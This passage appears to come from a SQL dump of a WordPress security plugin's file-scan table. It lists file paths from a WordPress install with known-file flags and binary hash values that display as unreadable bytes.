πS�#�����[11l[-�','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���c�z�tR���XU','���CF�j�[��G,}�\0�h������X|�','',0,'?'),('\r���ȫ���h�z��sr','wp-content/plugins/wordpress-seo/admin/class-suggested-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�z\Z��A�߄���','5���4O�_�&�e�<�\\���L�\\��7F�','',0,'?'),('\r�0�n$8W���4�_z','wp-includes/wp-includes/js/dist/url.min.js',0,'bͻ�:�[P�XpXα','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\r�pTt�\Z���n��!S�','wp-includes/wp-includes/wlwmanifest.xml',0,'�Ԑ����i�^��','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\r�����TD��p�','wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V&��i�g�5���0?|','{�x��ٌ���\nW��u����.h�l�(','',0,'?'),('\r�����Va�F','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LogLevel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��K\Z�+�l풊.\n\"�','߂􉃶:7?����⟈l7�E���q$�<','',0,'?'),('\r��#�|����~db\\�C','wp-content/plugins/wp-smushit/app/assets/js/smush-media.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,<�;[�/%���','&���+E�]/(:8!sE��k ��7`��ųwc','',0,'?'),('��)�U?3j;�jh:','wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b11�����W�:w','.�hH���\n� i��Д��9��y=��','',0,'?'),(':*�+i*�i2��}Q','wp-includes/style-engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���er�9rc�7�','��4�K�o�!�t���k�ۦ��܋�}`�+�veb\"','',0,'?'),('&�p�����!�U���','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qh�X$)+��Bs�','�\\m9!ח�T�a�(M����\07Gxy?g54GnZ','',0,'?'),('1mb�z憔n#�8��','wp-content/themes/hitmag/inc/customizer/custom-controls/class-upsell-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rpF5^UA4�ݕ','��.v\r&2��W8>�����uUV�,�\0��;6j','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!z�-^:��п$�','4a]���d����s\'	Tx�n\"���a�ݻ�','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��l_�a�c�-fְ','���e$���yn�D�w���ߋ��G�A�NdL','',0,'?'),('Z��w윩<�)mns','wp-includes/wp-includes/theme-compat/footer.php',0,'f�8��y̻�@�B�5','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('k�C�L��J����i�{','wp-content/plugins/wordpress-seo/src/integrations/admin/installation-success-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�u�Yo�]z5/k@L�','�-��H�|��*	d�c�����v����i�','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('��J%�_�%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',0,'�lzV6`wmZBs���','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('�\"��q&�ayU���','wp-content/themes/hitmag/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LwU�ȝu��\"��F�','u�u�VT������糝~��n�Zi�?M','',0,'?'),('��o+F���0Hn3�hJ','wp-includes/blocks/gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fMr�(�Cц�\"-?�','�\0 Y�?��zr��rU�i���	�]	�%�','',0,'?'),('ƃEG~��Ի�|','wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�@��a��.�E','�]�y��m�KMª�\\ڸg�ʘNK���ә','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�N�7e9��%�l;','��f	(\n�\Z�<��d����Eg^���Z�mF	�','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('͗�~��q��yL*>','wp-includes/blocks/block/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠE��֝����v0','?��`�{�W� ���e�6�W,��\'=B��9','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8-He�l�Ք��','�M�敩��9������E�<.0Kjb픱�2���','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{Zɬ��>M�hʢhO','\"l�EU����d�(\Z�Z#TO� ���\r>g���W','',0,'?'),('�ڝR���Q���7x�','wp-includes/wp-includes/shortcodes.php',0,'��\'9A�C��zaϥ�2','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('�o$#)G�h�D��','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ge/�����ö~,','���#(�a����C�&��g�P����','',0,'?'),('�ԫ#N��KAy�','wp-content/plugins/wordpress-seo/src/config/migrations/20211020091404_AddObjectTimestamps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��W�l���3F�&�','�����~\'�)!�p��x���F.�\Z�jn[�','',0,'?'),('�zY\\_��8dh���D�','wp-content/plugins/wp-cerber/assets/flags/gd.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�tD1�����Z$','�_W�u��y�;|$���/S�s9��R�@`f_�xn','',0,'?'),('\0��ߴ���:�HP�','wp-includes/css/classic-themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԳS�sq��&�t�','��U�M��d��3��!\0�ׯ�O^G19n_��\0','',0,'?'),('��p�1\'�l� ','wp-content/plugins/wordpress-seo/src/conditionals/xmlrpc-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vi̎b�S�1<��n�','��N��Nm[r.I`�W��o\\��F���C���:!','',0,'?'),('&���DA��z5�~','wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4q�A\"����','�a�X�_X<���mQ����(`���(%��','',0,'?'),('\'\'�T�e��%�c�8','wp-content/plugins/wordpress-seo/src/deprecated/admin/extension-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��S�Wq�0���Y�','���1�pa�\'�l��͖���6@�\Z����jᷓ','',0,'?'),('\'haU\Z�q�`����ug','wp-includes/blocks/navigation-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��u���Lwik�؟L','Y�\'��k锪1V���\Z�A�l�YU�m�B�P��','',0,'?'),('\'�E���~�(�l��','wp-includes/wp-includes/images/wlw/wp-watermark.png',0,';��uMmܭD|�w���D',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),(',o��Iw�u皍^Ķ','wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css',0,'����a�,U���ʑ�','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('4Z�{nq�uZE%S�','wp-content/plugins/wp-cerber/assets/flags/nl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�x#v\Z/�mv','�)k�W�����wjj��}��\Z�\n4Mԛ��Ģ�','',0,'?'),('6���f�7�w�cA\0','wp-includes/assets/script-loader-react-refresh-entry.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9Q*%M��i~J�','����,�Z�H�^-��C*0AJ��D��4�&','',0,'?'),('A�I�K��N�R�Z','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/open-graph/fb-app-id-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�M�$�eۋP�','��Tf��m=��9@t\n �\0y߲��9�A~Z���','',0,'?'),('A����!�j���V��','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��	���[�,����','JڴDM��&���4*\r�GD2/W�\' bG��','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�i8�G�͸x��B�9','(Z4�}v-�[�\"��(���yT_�v����','',0,'?'),('i���1��S��Yq�:O','wp-content/plugins/wp-cerber/assets/flags/tm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y\n|�Z�\Z�(7zo�y','�Xo�mI�a8���<�f_��r�W�:s��','',0,'?'),('qF�F=�1h�v�:�','wp-includes/wp-includes/js/jquery/ui/effect-explode.js',0,'��0���i!1��	�','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('wW�<��4|3%','wp-includes/wp-includes/js/jquery/jquery.serialize-object.js',0,'*�D�B\ru�6����!','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('��殇�w��m�W�o','wp-includes/wp-includes/class-wp-embed.php',0,'�1�����\\�OR���Z','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','򦅙o��d�0�o�','���ـ��Ny�Բk!g����n��z<���','',0,'?'),('�U�cO���d⻧W��','wp-content/plugins/redirection/locale/redirection-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��@�[�V#�<f��','�eDQ��F�eO�s����p����Jѣ','',0,'?'),('�����2\0\"_���','wp-content/themes/hitmag/inc/widgets/sidebar-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�Ts�=���]#NG�b','��H�.9t3o��lG�v0Q\ZwoY��글�?V','',0,'?'),('���u�z,(u�0','wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�h\r�\"�^i]9)q','E[ٔ��o����9�.��Q�L�\"�������3','',0,'?'),('��e��0��p�r���','wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js',0,'�&���\rb���!���','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('���6��j<���.7}�','wp-content/plugins/wordpress-seo/src/deprecated/admin/keyword-synonyms-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�n����hl��x�','	�SY�R���l���|n����D��1�','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�00�hU��ߛG�','wp-content/plugins/wp-cerber/assets/flags/bs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�\'t���ٓ�ٰ�>H','~_M���sc;��cUp\nU��W\0	�!','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('ç��`��� \n��B�','wp-includes/blocks/post-date/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gA8MN��@��=��3g','�y��A1 �6���nf4ܪ���щȁ�(9�','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�|�	�t��E���\'k�','[��w��gܪ��cSm��_x[��/�}�|�h','',0,'?'),('�O>�Pw�^�Y��X�','wp-includes/blocks/post-template/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���V��&�G��T�B','����գJ?�Lja��]^ޓ�	�R�V�%e.','',0,'?'),('�뷎wh\\Xs����l','wp-content/plugins/wordpress-seo/admin/pages/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�91\0<�&t�D/l��V','�[����h��3�;4A]�DA/����','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�����^G��u+','wp-includes/class-wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CS��e9����)�]�',':t�*X��XlT6��:��g�2�	��/�6G� ','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2Q���l�~���!','�š�t�RS)�z�\\{ӑ(�Wd��9c�K�F�','',0,'?'),('�\0��Y�y2>IM�3','wp-includes/wp-includes/js/wp-list-revisions.js',0,'PbOP�xO�rs7��2','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�X����{hMr�ϒ��','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js',0,'m��3���ܖ3��M','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����i�sB%�s\"<','QA\"ʀ����R�o�v���g�3�ց�p#̈�Q','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�sݢ5�/ �\'h�Y','���$Wuzh��:�!��{�����ܺ\"�u�k�','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��[%�3�\"x`W49�','�fѠY�Dz@�ΣJ$��fW���������-�v','',0,'?'),('@,�]�6NzIg�%-','wp-includes/wp-includes/js/jcrop/Jcrop.gif',0,'Z��7e�����Q�%K','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('����ibH���_�A','wp-includes/wp-includes/js/jquery/ui/resizable.js',0,'vk�mO,�步n3���','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('z\0��3h���d�*','wp-includes/blocks/post-template/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�@m�̕WA�U��7','|N��֊y�޼������$�Y���k�D`Vy','',0,'?'),('&a;�[T�\'�YM��','wp-content/themes/hitmag/inc/kirki/core/class-kirki-sanitize-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�O�\"�BZb\0L','�T[A�q��w\Z��!�U�$Q�������A-�','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1���-��%	�','�&�ޗw�eX��\Z����K��?٢\'��\'','',0,'?'),('4��B\\4�F��^+̔�','wp-content/plugins/wp-smushit/_src/scss/common.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\'.�<�ŭ����*4','`t��d���5ۿ�묋�@��ZB9)�w��0�','',0,'?'),('9�zh��!�9Pmk�','wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����zѰ6Z	','��H��㮁\0�hZ\'�0y8SA���E�l','',0,'?'),(':��Nf��n9rxH:̯','wp-content/plugins/wordpress-seo/src/conditionals/the-events-calendar-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\r֓ y9����','��t3\Z�����\'���F#\0���|��׾|�:','',0,'?'),('=�[:���\r&�F��E','wp-includes/blocks/video/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��m����5 ���V','��7a�ׯY�,���[������4��vU�Ns� �','',0,'?'),('>B�\"�6ǷT*Wض','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-vip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�*d�^d	��T�\Z','�`����\r�,����-)�����}3�{','',0,'?'),('?���϶�^7:y��','wp-includes/blocks/paragraph/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�\Z\0���#c��-�','�>�ǡ�e}�֋f�y|4��E\0Dcn2��`+�','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BM���N� ','�Ir��J��4̩U�v���\\�=�u��T<!��','',0,'?'),('L�%��w��x64�v3','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-start.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���_½1f��xPc','��A�}A�����G-�e��tl��\r�²,�','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2|\n0��6s��\Z','�Ǭ�Ķ�*�Z/7U��(�wz;��d���G!�','',0,'?'),('j�Mg����}{�','wp-includes/wp-includes/js/jquery/ui/droppable.min.js',0,'>���K�-�E،�N�','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('kT�fp8oo@�%\"','wp-includes/wp-includes/js/customize-base.js',0,'��Gx�Fy1w��׻','��Gx�Fy1w��׻','�s7�-<%���WȒߚC�.��.	��zW','',0,'?'),('wՓk-�P��b�ϊ�','wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load-native.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9)dcıbK���d	�','w�ηC<I�z��p��\rt��V�0o0�m��8�G�','',0,'?'),('~�Q�E�pF=��\n','wp-content/plugins/wordfence/css/wfselect2.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('��E�_*:6`I�t���','wp-content/plugins/wordpress-seo/inc/date-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��]�i�k��4�%{','M�:��C��Ԗ,0��0����\\�|3���','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�S#Z�P%��','\0g�w��Mjk��c~��$�垇��#*s��0','',0,'?'),('��ĈV�t�˾|#i�','wp-includes/wp-includes/js/dist/hooks.min.js',0,'<q@o�P��u����','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('��:� r�YƸ�u','wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js',0,'L�m�Q4փ��]�','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�bG�Y��_','�@�M$%c�vQ���$��A�2�k�Ӹ>','',0,'?'),('�ڤ& �M�KQ�o?','wp-admin/images/freedom-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"� 0�g�H>��D','��\"@Y�D�]\\�qw�?�\09��B*�7���','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Z�!��_����+k','�4{�)�x��}��$z�l⡘9+��\r��h@sz�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����<�^G��\"0c!','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('���;��i�0��J~�','wp-includes/blocks/columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=2��X�t�}^侹�_','w>��j�Bi}���#p�S���$��g~J`�v','',0,'?'),('�zIʳT=��sa�','wp-includes/blocks/comments-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ry\"[�J�KP���R�','v�\0HL�Q-ڣ/5Oa\"��^֠ƙ�W:6����X','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A+n7����uX�t��','����<�7Jk��u3���A��)Ơ;,94�e�Ú�','',0,'?'),('�Ys}���\r�$dO�','wp-content/themes/hitmag/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��5������6','���;#�@�o~����sI,�Y�b/�Lˑ<+','',0,'?'),('�1U>��t�j�q����','wp-includes/wp-includes/js/jquery/ui/selectable.js',0,'!9�qf��H7�{B,�z�','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}D���B���E��','O�d��K&�:����g�\0P����y`pρ\n�','',0,'?'),('���d�ƍg V��GD','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D��]�x��z��1','u}�/�2p��&��{��(�;1`���kg�','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\"�,�w���%�ю��','��$b\"�=Z�O��}4��<\nGH���9�','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���A�ki#p��','\"�z��\n��%	� B�%�w	ۛys�7ңku�q�','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�Nc	Qc��6�o1j�','���_.�0{�ʻ6���sd�ڢ�͊ᢹD@','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�)\ri؊��^�w��','���z %G*߾�����+w��\'4�,�=u�N','',0,'?'),('mR��l�=��$��e��','wp-content/plugins/wp-smushit/_src/js/smush/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��B������#','���`Y���\"��Nj� _{3+]��`6J�8MV','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PN���\Z�\0�CRG��','��dp^��ǚ+�.�E���zCR#��ԃQ��','',0,'?'),('��>�`P���@��߹','wp-includes/theme-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��N�B�C0F_N','A��7j�9���Ԍ3a��GOKK��c','',0,'?'),('���n#3Iî��V1','wp-content/plugins/wp-fastest-cache/templates/updatepost.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5d�N1�����K�m','��H�7=��%<��6\n�f6@a���X�=��\n','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�G�p�ʓ���vT�','�d���=�]�+j��a��w��ʱ�m��3�','',0,'?'),('�S������}6�Y','wp-includes/wp-includes/js/jquery/ui/tabs.js',0,'+�73�l��c�P���R','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5bcjc�Tc�sq�̣]','W:.@�H9�K�B5\\�a�t	얗�ʪg�/','',0,'?'),('�s���9�\"�?','wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�X�֭��S��/�','H��d�sE��R,vYD+�*�*\'�N���a�i��','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� 